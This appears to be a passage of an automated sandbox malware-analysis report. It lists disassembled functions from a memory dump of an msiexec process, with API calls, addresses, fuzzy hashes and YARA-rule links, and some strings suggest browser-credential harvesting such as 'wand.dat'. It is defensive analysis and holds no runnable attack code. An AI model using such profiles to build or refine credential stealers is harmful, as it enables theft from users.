                                                                                                                                                                                                          • Opcode ID: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                          Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                          Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1471605966-0
                                                                                                                                                                                                          • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                          Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                          Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                          Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                                                                                                          • String ID: @@@@$History
                                                                                                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                                                                                                          • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                          • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                          Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                          Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                          Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                          • String ID: MS Sans Serif
                                                                                                                                                                                                          • API String ID: 210187428-168460110
                                                                                                                                                                                                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                          Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                          • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$memcmp
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3384217055-0
                                                                                                                                                                                                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                          Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$memcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 368790112-0
                                                                                                                                                                                                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                                          Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                          • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                          • API String ID: 2618321458-1828844352
                                                                                                                                                                                                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3550944819-0
                                                                                                                                                                                                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                          Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy$free
                                                                                                                                                                                                          • String ID: g4@
                                                                                                                                                                                                          • API String ID: 2888793982-2133833424
                                                                                                                                                                                                          • Opcode ID: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                                                                                                                                                                                                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4c875be1691c16b6b0488e2c5ae259581ad0285ed380af5e7f19d00b6790c48
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7507DF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                          • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7507DF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                          • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2605342592-0
